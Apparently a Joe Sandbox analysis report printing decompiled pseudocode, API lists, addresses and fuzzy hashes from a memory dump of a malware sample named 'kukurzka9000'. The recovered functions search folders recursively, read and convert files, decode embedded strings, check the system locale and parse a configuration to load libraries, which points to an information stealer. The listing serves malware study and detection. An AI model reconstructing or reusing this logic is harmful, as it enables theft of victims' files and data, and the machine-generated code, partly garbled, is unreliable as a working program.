								if(_t103 != 0) {
									_t105 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
									_t191 =  *((intOrPtr*)( *0x40e13c))(_t105, _a12);
									_v32 = _t191;
									_t107 =  *((intOrPtr*)( *0x40e0e0))(_t191, 0, 0x5c);
									_t35 = _t107 + 2; // 0x2
									_t160 = _t35 - _t191;
									__eflags = _t160;
									 *((short*)(_t191 + (_t160 >> 1) * 2 - 0x16)) = 0;
									_t109 =  *((intOrPtr*)( *0x40e0e0))(_t191, 0, 0x5c);
									_t39 = _t109 + 2; // 0x2
									 *((intOrPtr*)( *0x40e044))(0x40, 0x208);
									_t192 = _v24;
									_t111 = E0040A503(0, _t192);
									_t193 =  *((intOrPtr*)( *0x40e000))(_t111, _t192,  &_v596);
									E004039D7(_t193, _v16, __eflags, _t39, _t35, _v36, _a4);
									_t194 = _t194 + 0x10;
									LocalFree(_t193);
									LocalFree(_v32);
									_t127 = _v40;
								}
							}
						}
						_t101 =  *((intOrPtr*)( *0x40e148))(_t127,  &_v640);
						__eflags = _t101;
					} while (_t101 != 0);
					FindClose(_t127);
					LocalFree(_v12);
					LocalFree(_v16);
					LocalFree(_v20);
					LocalFree(_v24);
					LocalFree(_v44);
					_t123 = _v48 + 2;
					__eflags = _t123;
					_t60 =  *((intOrPtr*)( *0x40e18c))(_t123,  *0x40e1a8);
				}
				goto L17;
			}

0x00403ca6
0x00403caa
0x00403cad
0x00403f55
0x00403f55
0x00403f59
0x00000000
0x00000000
0x00403cbf
0x00403cc3
0x00403cd1
0x00403cd5
0x00403ce6
0x00403cf0
0x00403cfb
0x00403d0a
0x00403d1b
0x00403d27
0x00403d3b
0x00403d3e
0x00403d41
0x00403d48
0x00403d4a
0x00403f7f
0x00403f88
0x00403f8f
0x00403f8f
0x00403f95
0x00000000
0x00403f97
0x00403d6b
0x00403d71
0x00403d78
0x00403d7f
0x00403d81
0x00403f65
0x00403f68
0x00403f71
0x00403f8f
0x00000000
0x00403f8f
0x00403d93
0x00403d9b
0x00403da6
0x00403dac
0x00403db3
0x00403db5
0x00000000
0x00000000
0x00403dc8
0x00403dd7
0x00403de4
0x00403ded
0x00403df2
0x00403dfa
0x00403e0d
0x00403e12
0x00403e14
0x00403e17
0x00403e1a
0x00000000
0x00000000
0x00000000
0x00000000
0x00403e20
0x00403e20
0x00403e20
0x00403e27
0x00403e2d
0x00403e35
0x00403e4a
0x00403e4c
0x00403e4e
0x00403e60
0x00403e74
0x00403e7b
0x00403e7e
0x00403e82
0x00403e89
0x00403e89
0x00403e8f
0x00403e9a
0x00403ea9
0x00403eac
0x00403eae
0x00403eb5
0x00403ed1
0x00403eda
0x00403edf
0x00403ee3
0x00403eec
0x00403ef2
0x00403ef2
0x00403e4e
0x00403e35
0x00403f02
0x00403f04
0x00403f04
0x00403f0d
0x00403f16
0x00403f1f
0x00403f28
0x00403f31
0x00403f3a
0x00403f4f
0x00403f4f
0x00403f53
0x00403f53
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 00403CF0
LocalAlloc.KERNEL32(00000040,00000000), ref: 00403D0A
LocalAlloc.KERNEL32(00000040,00000000), ref: 00403D25

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 8a6da0735ee3c45563ce6ef7da6886ff2a780dc9bc9fef783d63b4fc9ada9af1
Instruction ID: 30a2a756aa81b8726d571d7f3e9c3124e2b02b732ad4ca54e9afcb5ed5404845
Opcode Fuzzy Hash: 8a6da0735ee3c45563ce6ef7da6886ff2a780dc9bc9fef783d63b4fc9ada9af1
Instruction Fuzzy Hash: CC91B571A00215AFDF089FA5DD49DAE7BB9EB48310F004839F905B73A0DB746D21CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004052DA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 232
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E004052DA(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v576;
				char _v584;
				char _v616;
				signed char _v620;
				intOrPtr _v628;
				void* _v632;
				void* _v648;
				intOrPtr _v672;
				char _v676;
				intOrPtr _v696;
				void* _v704;
				intOrPtr _v708;
				void* _v712;
				void* _v720;
				void* _v724;
				void* _v728;
				char _v744;
				intOrPtr _v756;
				intOrPtr _v768;
				void* _v776;
				intOrPtr _v784;
				signed int _v792;
				void* _v796;
				void* _v800;
				void* _v804;
				intOrPtr _v808;
				void* _v812;
				void* _v828;
				void* _v836;
				void* __ebx;
				void* __esi;
				void* _t62;
				void* _t68;
				char _t69;
				void* _t70;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int _t74;
				void* _t76;
				void* _t86;
				void* _t112;
				void* _t113;
				void* _t114;
				intOrPtr _t151;
				void* _t153;
				void* _t154;
				void* _t159;
				void* _t161;
				void* _t163;
				void* _t164;
				signed int _t166;
				void* _t168;

				_t168 = (_t166 & 0xfffffff8) - 0x284;
				_v628 = __edx;
				_t62 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a, _t153, _t159, _t112);
				_t113 =  *((intOrPtr*)( *0x40e13c))(_t62, __ecx);
				_v632 = _t113;
				E0040188C(_t113, _t113, 0x104, __ecx,  *0x40e1d0);
				_t154 =  *((intOrPtr*)( *0x40e018))(_t113,  &_v616);
				_v648 = _t154;
				if(_t154 != 0xffffffff) {
					_t114 = __ecx;
					do {
						if((_v620 & 0x00000010) == 0) {
							_t68 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
							_t69 =  *((intOrPtr*)( *0x40e000))(_t68, _t114,  &_v584);
							_v676 = _t69;
							_t70 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
							_t72 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t70,  *0x40e1b8), _a4);
							_v708 = _t72;
							_t73 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
							_v708 = _t73;
							_t74 =  *((intOrPtr*)( *0x40e08c))(0);
							_t161 = _v704;
							if(E0040A2AA(_t161 + _t74 * 2,  &_v712, _v696) != 0) {
								_t76 = E0040A503(_v720, _v712);
								_v720 = _t76;
								_v724 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
								if(E0040A69E( *0x40e044,  &_v724) != 0) {
									_t164 = _v724;
									_push(0);
									_push(_t164);
									_push(_v712);
									if( *((intOrPtr*)( *0x40e184))() != 0) {
										_v756 =  *((intOrPtr*)( *0x40e03c))(_t164, 0x80000000, 1, 0, 4, 0, 0);
										 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v768, 0xffffffff, 0, 0, 0, 0);
										_v776 = 0;
										 *((intOrPtr*)( *0x40e044))(0x40, 0x30c);
										_t151 = _v784;
										_v804 = 0;
										if(_t151 != 0) {
											 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v808, 0xffffffff, 0, _t151, 0, 0);
											if(0 == 0 || E0040A70E( &_v744, _a8) == 0) {
												LocalFree(_v836);
												CloseHandle(_v828);
												DeleteFileW(_t164);
												LocalFree(_t164);
											} else {
												_t139 = _a20;
												_v792 = _v792 & 0x00000000;
												_v804 = _v836;
												_v800 = _v828;
												_v796 = _t164;
												 *_t139 =  *_a20 + 1;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t154 = _v812;
											}
										}
									}
								}
								LocalFree(_v712);
							} else {
								LocalFree(_t161);
							}
							LocalFree(_v728);
							LocalFree(_v720);
							L18:
							goto L19;
						}
						if(_v576 != 0x2e && E0040A70E( &_v576, _a12) == 0) {
							_t86 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
							_t163 =  *((intOrPtr*)( *0x40e000))(_t86, _t114,  &_v584);
							E004052DA(_t163, _v672, _a4, _a8, _a12, _a16, _a20);
							_t168 = _t168 + 0x14;
							LocalFree(_t163);
							goto L18;
						}
						L19:
						_push( &_v676);
						_push(_t154);
					} while ( *((intOrPtr*)( *0x40e148))() != 0);
					LocalFree(_v704);
					FindClose(_t154);
					goto L21;
				} else {
					LocalFree(_t113);
					L21:
					return 0;
				}
			}

0x004052e0
0x004052f5
0x004052fb
0x0040530d
0x00405316
0x0040531a
0x0040532d
0x0040532f
0x00405336
0x00405344
0x00405346
0x0040534b
0x004053bb
0x004053ca
0x004053d9
0x004053dd
0x004053f3
0x00405405
0x00405409
0x00405417
0x0040541b
0x0040541d
0x00405430
0x00405440
0x00405452
0x0040545c
0x00405467
0x0040546d
0x00405476
0x00405478
0x00405479
0x00405481
0x004054a3
0x004054b9
0x004054c8
0x004054cc
0x004054ce
0x004054d2
0x004054d8
0x004054f7
0x004054fb
0x00405549
0x00405554
0x0040555b
0x00405562
0x0040550d
0x0040550d
0x00405514
0x00405519
0x00405521
0x00405530
0x00405538
0x0040553a
0x0040553b
0x0040553c
0x0040553d
0x0040553e
0x0040553e
0x004054fb
0x004054d8
0x00405481
0x0040556c
0x00405432
0x0040556c
0x0040556c
0x00405576
0x00405580
0x00405580
0x00000000
0x00405580
0x00405353
0x00405379
0x00405391
0x004053a1
0x004053a6
0x00405580
0x00000000
0x00405580
0x00405586
0x0040558f
0x00405590
0x00405593
0x004055a0
0x004055a7
0x00000000
0x00405338
0x00405339
0x004055ad
0x004055b5
0x004055b5

APIs

LocalFree.KERNEL32(00000000), ref: 00405339
LocalFree.KERNEL32(?), ref: 00405580
LocalFree.KERNEL32(?), ref: 004055A0
FindClose.KERNEL32(00000000), ref: 004055A7

Strings

., xrefs: 0040534D

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$CloseFind
String ID: .
API String ID: 3269183270-248832578
Opcode ID: 85117cb3117e62e14ba48f75263d130d3e59801c8bcbb9a650a8682f5d93ebc2
Instruction ID: 9add6ecd6c2ae3d530fb5184dfeb79ca83270308c151c7c4913ae962937730f4
Opcode Fuzzy Hash: 85117cb3117e62e14ba48f75263d130d3e59801c8bcbb9a650a8682f5d93ebc2
Instruction Fuzzy Hash: 9C816CB1604301AFDB04DF61DD45E2B77A5EB88714F004D2DFA55A72E0DBB4E910CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401B05 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401BA9
LocalFree.KERNEL32(00000000), ref: 00401C0D
FindClose.KERNEL32(00000000), ref: 00401C7A

Strings

8{@, xrefs: 00401C53, 00401BF5

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: CloseCombineFindFreeLocalPath
String ID: 8{@
API String ID: 2857355001-1865321623
Opcode ID: feaf2723ab089db3c6e73f9a78e146223a76f71caf34b501c7023f33917ed91e
Instruction ID: e4eb25170f48de3e52739dcc6529c8d0564bd3351774df583b1370a22c53c5e7
Opcode Fuzzy Hash: feaf2723ab089db3c6e73f9a78e146223a76f71caf34b501c7023f33917ed91e
Instruction Fuzzy Hash: 6741E871900214ABDB149B61DEC8FAA7778EB85300F004579F905B72A0EB79DE55CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040196E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401A10
LocalFree.KERNEL32(00000000), ref: 00401A30
FindClose.KERNEL32(00000000), ref: 00401A4E
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401AA4

Strings

xk, xrefs: 00401A73

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: CombinePath$CloseFindFreeLocal
String ID: xk
API String ID: 2199340046-3298155637
Opcode ID: 8d4b454fa07d57e91eda3078c457a80832fe221a6e70e63dacd382864624ccd9
Instruction ID: 3d68e71345cd2aefdee3dd56593ad5adbe6c8fe38e95c290ac396d302c259ee2
Opcode Fuzzy Hash: 8d4b454fa07d57e91eda3078c457a80832fe221a6e70e63dacd382864624ccd9
Instruction Fuzzy Hash: D2410571600214ABDB24EB55DD84FAB7378EB44300F00457AF905B32E0EB789E55CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409064 Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00409064(void* __eflags, intOrPtr* _a4) {
				void* _t13;
				void* _t17;
				intOrPtr* _t19;

				_t13 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_t17 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				GetLocaleInfoW(GetUserDefaultLCID(), 0x1001, _t13, 0x104);
				wsprintfW(_t17,  *0x40e47c, _t13);
				_t19 = _a4;
				 *_t19 = E0040A503( *_t19, _t17);
				LocalFree(_t13);
				LocalFree(_t17);
				return 1;
			}

0x0040907e
0x0040908f
0x004090a3
0x004090ad
0x004090b3
0x004090c3
0x004090c5
0x004090cc
0x004090d9

APIs

GetUserDefaultLCID.KERNEL32(00001001,00000000,00000104,?,00409A50,00000000), ref: 0040909C
GetLocaleInfoW.KERNEL32(00000000,?,00409A50,00000000,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090A3
wsprintfW.USER32 ref: 004090AD

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090C5
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090CC

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Locallstrlen$DefaultGlobalInfoLocaleUserwsprintf
String ID:
API String ID: 2247720945-0
Opcode ID: 62d0f9841ec6e868d0d1d7cb96462110b985b39fb2cc8cbfcb7090088de899c8
Instruction ID: 624d8c4e8efa692e5b23cff9d3e49fd3310a2e312a93838384a0c37449368444
Opcode Fuzzy Hash: 62d0f9841ec6e868d0d1d7cb96462110b985b39fb2cc8cbfcb7090088de899c8
Instruction Fuzzy Hash: 84F0C8B1200214BFF3005BA6AD89E6777ACEB48724F004435F748B7290CAB46C20866D

Uniqueness

Uniqueness Score: -1.00%

Function 00406468 Relevance: 6.1, APIs: 4, Instructions: 137encryptionCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(0040687A,00000000), ref: 004064AB
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?), ref: 0040655B
LocalFree.KERNEL32(00000000), ref: 00406575
LocalFree.KERNEL32(?), ref: 004065CA

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$BinaryByteCharCryptMultiStringWide
String ID:
API String ID: 565018292-0
Opcode ID: f99eeab593d43d46b53e483af27d95279f1ed3bfb06a039265a8d3998aacac8f
Instruction ID: ac64a0b193ce7f41f530b5697522d6c2b33bbf0bf2498a0822923da046ee8569
Opcode Fuzzy Hash: f99eeab593d43d46b53e483af27d95279f1ed3bfb06a039265a8d3998aacac8f
Instruction Fuzzy Hash: 93417A71A00215AFEB14CBA6DD81FBEBBF8EF88710F104429F605F7290D774A9118B69

Uniqueness

Uniqueness Score: -1.00%

Function 004055B6 Relevance: 74.0, APIs: 49, Instructions: 476
memoryregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 34%

			E004055B6(intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				intOrPtr _v56;
				signed int _v60;
				char _v64;
				void* __ecx;
				void* _t117;
				void* _t124;
				void* _t131;
				void* _t138;
				void* _t147;
				void* _t156;
				void* _t162;
				void* _t167;
				void* _t181;
				void* _t182;
				void* _t194;
				void* _t195;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t226;
				void* _t228;
				void* _t229;
				void* _t230;
				char _t274;
				void* _t289;
				void* _t291;
				void* _t295;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				int _t309;
				void* _t311;
				void* _t314;
				signed int _t317;
				void* _t319;
				signed int _t321;
				void* _t323;
				signed int _t325;
				void* _t327;
				signed int _t329;
				void* _t331;
				signed int _t333;
				void* _t335;
				signed int _t337;
				void* _t339;
				signed int _t341;
				void* _t344;
				void* _t345;
				void* _t347;
				void* _t348;

				_v56 = __edx;
				_t295 =  *((intOrPtr*)( *0x40e18c))(_t230,  *0x40e250);
				if(_t295 == 0) {
					L42:
					return 0;
				}
				while(1) {
					_t296 = _t295 + 0xa;
					_t117 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t296) + _t115);
					_t226 = _t117;
					_v8 = _t226;
					_t314 =  *((intOrPtr*)( *0x40e18c))(_t296,  *0x40e1f0);
					if(_t314 == 0) {
						break;
					}
					_t317 = _t314 - _t296 >> 1;
					if(E0040A3E4(_t296,  &_v8, 0, _t317) == 0) {
						_t226 = _v8;
						break;
					}
					_t298 = _t296 + _t317 * 2 + 2;
					_t124 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t298) + _t122);
					_t226 = _t124;
					_v12 = _t226;
					_t319 =  *((intOrPtr*)( *0x40e18c))(_t298,  *0x40e20c);
					if(_t319 == 0) {
						L37:
						LocalFree(_v8);
						L29:
						break;
					}
					_t321 = _t319 - _t298 >> 1;
					if(E0040A3E4(_t298,  &_v12, 0, _t321) == 0) {
						_t226 = _v12;
						goto L37;
					}
					_t300 = _t298 + _t321 * 2 + 2;
					_t131 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t300) + _t129);
					_t226 = _t131;
					_v16 = _t226;
					_t323 =  *((intOrPtr*)( *0x40e18c))(_t300,  *0x40e20c);
					if(_t323 == 0) {
						L35:
						LocalFree(_v8);
						LocalFree(_v12);
						goto L29;
					}
					_t325 = _t323 - _t300 >> 1;
					if(E0040A3E4(_t300,  &_v16, 0, _t325) == 0) {
						_t226 = _v16;
						goto L35;
					}
					_t302 = _t300 + _t325 * 2 + 2;
					_t138 = LocalAlloc(0x40, RegOpenKeyExA(_t302, ??, ??, ??, ??) + _t136);
					_t228 = _t138;
					_v20 = _t228;
					_t327 =  *((intOrPtr*)( *0x40e18c))(_t302,  *0x40e20c);
					if(_t327 == 0) {
						L33:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_t228);
						LocalFree(_v16);
						L40:
						L41:
						goto L42;
					}
					_t329 = _t327 - _t302 >> 1;
					if(E0040A3E4(_t302,  &_v20, 0, _t329) == 0) {
						_t228 = _v20;
						goto L33;
					}
					_t304 = _t302 + _t329 * 2 + 2;
					_t147 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t304) + _t145);
					_t226 = _t147;
					_v24 = _t226;
					_t331 =  *((intOrPtr*)( *0x40e18c))(_t304,  *0x40e20c);
					if(_t331 == 0) {
						L31:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v20);
						goto L29;
					}
					_t333 = _t331 - _t304 >> 1;
					if(E0040A3E4(_t304,  &_v24, 0, _t333) == 0) {
						_t226 = _v24;
						goto L31;
					}
					_t306 = _t304 + _t333 * 2 + 2;
					_t156 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t306) + _t154);
					_t226 = _t156;
					_v32 = _t226;
					_t335 =  *((intOrPtr*)( *0x40e18c))(_t306,  *0x40e20c);
					if(_t335 == 0) {
						L28:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v20);
						LocalFree(_v24);
						goto L29;
					}
					_t337 = _t335 - _t306 >> 1;
					_t162 = E0040A3E4(_t306,  &_v32, 0, _t337);
					_t226 = _v32;
					if(_t162 == 0) {
						goto L28;
					}
					_t308 = _t306 + _t337 * 2 + 2;
					_v44 =  *_t226 & 0x0000ffff;
					_t167 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t308) + _t165);
					_v28 = _t167;
					_t339 =  *((intOrPtr*)( *0x40e18c))(_t308,  *0x40e20c);
					if(_t339 == 0) {
						L27:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v24);
						LocalFree(_v20);
						LocalFree(_t226);
						LocalFree(_v28);
						goto L40;
					}
					_t341 = _t339 - _t308 >> 1;
					if(E0040A3E4(_t308,  &_v28, 0, _t341) == 0) {
						goto L27;
					}
					_t229 = _t308 + (_t341 + 1) * 2;
					_v48 =  *_v28 & 0x0000ffff;
					_t309 = 0x40;
					_t181 = LocalAlloc(_t309, ??);
					_t344 = _t181;
					_v36 = _t344;
					_t182 =  *((intOrPtr*)( *0x40e18c))(_t229,  *0x40e228,  *((intOrPtr*)( *0x40e08c))(_t229) + _t179);
					if(_t182 == 0) {
						L26:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v24);
						LocalFree(_v20);
						LocalFree(_v32);
						LocalFree(_v28);
						LocalFree(_t344);
						goto L40;
					}
					if(LoadLibraryExA(0, _t182 - _t229 >> 1, ??) == 0) {
						_t344 = _v36;
						goto L26;
					}
					_v40 = _v40 & 0x00000000;
					_t194 =  *((intOrPtr*)( *0x40e044))(_t309, 0x28000);
					_t345 = _t194;
					_v52 = _t345;
					_t195 =  *((intOrPtr*)( *0x40e074))(_v24);
					_push( &_v40);
					_push(_t345);
					_t289 = 0x31;
					_push(0 | _v48 == _t289);
					_push(0 | _v44 == _t289);
					_push(_t195);
					_push(_v20);
					_push(_v16);
					_push(_v12);
					E00405FEB(_v36, _v8);
					_t348 = _t348 + 0x20;
					if(_v40 > 0) {
						_t209 =  *((intOrPtr*)( *0x40e044))(_t309, 0x208);
						_t210 =  *((intOrPtr*)( *0x40e044))(_t309, 0x208);
						_t291 = 0x10;
						_t211 = E0040A05F(_t209, _t291);
						_v48 = _t211;
						_t212 =  *((intOrPtr*)( *0x40e13c))(_t210,  *0x40e210);
						_t311 = _v48;
						_t213 = E0040A503(_t212, _t311);
						_t274 =  *0x40e204; // 0x6e78d8
						_v60 = _v60 & 0x00000000;
						_v64 = _t274;
						_v48 = _t213;
						_t214 = E00408619( &_v48);
						_v44 = _t214;
						_t347 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
						 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t311, 0xffffffff, 0, 0, 0, 0);
						if(0 != 0) {
							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t311, 0xffffffff, _t347, 0, 0, 0);
							if(0 != 0) {
								E00407EDB(_v56, _t347, 0, 0, _v40, _v52, _v44,  &_v64);
								_t348 = _t348 + 0x18;
							}
						}
						LocalFree(_t347);
						LocalFree(_v44);
						LocalFree(_v48);
						LocalFree(_t311);
						_t345 = _v52;
					}
					LocalFree(_t345);
					LocalFree(_v8);
					LocalFree(_v12);
					LocalFree(_v16);
					LocalFree(_v20);
					LocalFree(_v24);
					LocalFree(_v32);
					LocalFree(_v28);
					LocalFree(_v36);
					_t295 =  *((intOrPtr*)( *0x40e18c))(_t229,  *0x40e250);
					if(_t295 != 0) {
						continue;
					} else {
						goto L41;
					}
				}
				LocalFree(_t226);
				goto L40;
			}

0x004055c8
0x004055ce
0x004055d2
0x00405b56
0x00405b5a
0x00405b5a
0x004055da
0x004055df
0x004055f0
0x004055fe
0x00405601
0x00405606
0x0040560a
0x00000000
0x00000000
0x00405615
0x00405625
0x00405b4a
0x00000000
0x00405b4a
0x00405639
0x00405644
0x00405652
0x00405655
0x0040565a
0x0040565e
0x00405b45
0x00405ae5
0x00405ae5
0x00000000
0x00405ae5
0x00405669
0x00405679
0x00405b42
0x00000000
0x00405b42
0x0040568d
0x00405698
0x004056a6
0x004056a9
0x004056ae
0x004056b2
0x00405b34
0x00405b37
0x00405ae5
0x00000000
0x00405ae5
0x004056bd
0x004056cd
0x00405b31
0x00000000
0x00405b31
0x004056e1
0x004056ec
0x004056fa
0x004056fd
0x00405702
0x00405706
0x00405b13
0x00405b16
0x00405b1f
0x00405b26
0x00405b4e
0x00405b4e
0x00405b54
0x00000000
0x00405b55
0x00405711
0x00405721
0x00405b10
0x00000000
0x00405b10
0x00405735
0x00405740
0x0040574e
0x00405751
0x00405756
0x0040575a
0x00405af0
0x00405af3
0x00405afc
0x00405b05
0x00405ae5
0x00000000
0x00405ae5
0x00405765
0x00405775
0x00405aed
0x00000000
0x00405aed
0x00405789
0x00405794
0x004057a2
0x004057a5
0x004057aa
0x004057ae
0x00405abe
0x00405ac1
0x00405aca
0x00405ad3
0x00405adc
0x00405ae5
0x00000000
0x00405ae5
0x004057b9
0x004057c0
0x004057c5
0x004057cc
0x00000000
0x00000000
0x004057de
0x004057e1
0x004057f1
0x00405800
0x00405805
0x00405809
0x00405a82
0x00405a85
0x00405a8e
0x00405a97
0x00405aa0
0x00405aa9
0x00405ab0
0x00405b4e
0x00000000
0x00405b4e
0x00405814
0x00405824
0x00000000
0x00000000
0x00405831
0x0040583a
0x0040584a
0x0040584c
0x0040585a
0x0040585d
0x00405860
0x00405864
0x00405a3d
0x00405a40
0x00405a49
0x00405a52
0x00405a5b
0x00405a64
0x00405a6d
0x00405a76
0x00405b4e
0x00000000
0x00405b4e
0x0040587f
0x00405a3a
0x00000000
0x00405a3a
0x0040588a
0x00405894
0x0040589f
0x004058a1
0x004058a4
0x004058a9
0x004058aa
0x004058ad
0x004058b7
0x004058c4
0x004058c8
0x004058c9
0x004058cc
0x004058cf
0x004058d2
0x004058d7
0x004058de
0x004058ef
0x004058ff
0x00405903
0x00405908
0x0040591a
0x0040591d
0x0040591f
0x00405926
0x0040592b
0x00405931
0x00405935
0x0040593b
0x0040593e
0x00405950
0x0040595b
0x0040596c
0x00405970
0x00405987
0x0040598b
0x004059a3
0x004059a8
0x004059a8
0x0040598b
0x004059ac
0x004059b5
0x004059be
0x004059c5
0x004059cb
0x004059cb
0x004059cf
0x004059d8
0x004059e1
0x004059ea
0x004059f3
0x004059fc
0x00405a05
0x00405a0e
0x00405a17
0x00405a2b
0x00405a2f
0x00000000
0x00405a35
0x00000000
0x00405a35
0x00405a2f
0x00405b4e
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 004055F0
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B4E

Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

LocalAlloc.KERNEL32(00000040,00000000), ref: 00405644
LocalAlloc.KERNEL32(00000040,00000000), ref: 00405698
RegOpenKeyExA.KERNELBASE(-00000010), ref: 004056E5
LocalAlloc.KERNEL32(00000040,00000000), ref: 004056EC
LocalAlloc.KERNEL32(00000040,00000000), ref: 00405740
LocalAlloc.KERNEL32(00000040,00000000), ref: 00405794
LocalAlloc.KERNEL32(00000040,00000000), ref: 004057F1
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040584C
LoadLibraryExA.KERNELBASE ref: 00405876

Part of subcall function 00405FEB: lstrlenW.KERNEL32(006E7CF8,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406137

LocalFree.KERNEL32(00000000), ref: 004059AC
LocalFree.KERNEL32(?), ref: 004059B5
LocalFree.KERNEL32(?), ref: 004059BE
LocalFree.KERNEL32(?), ref: 004059C5
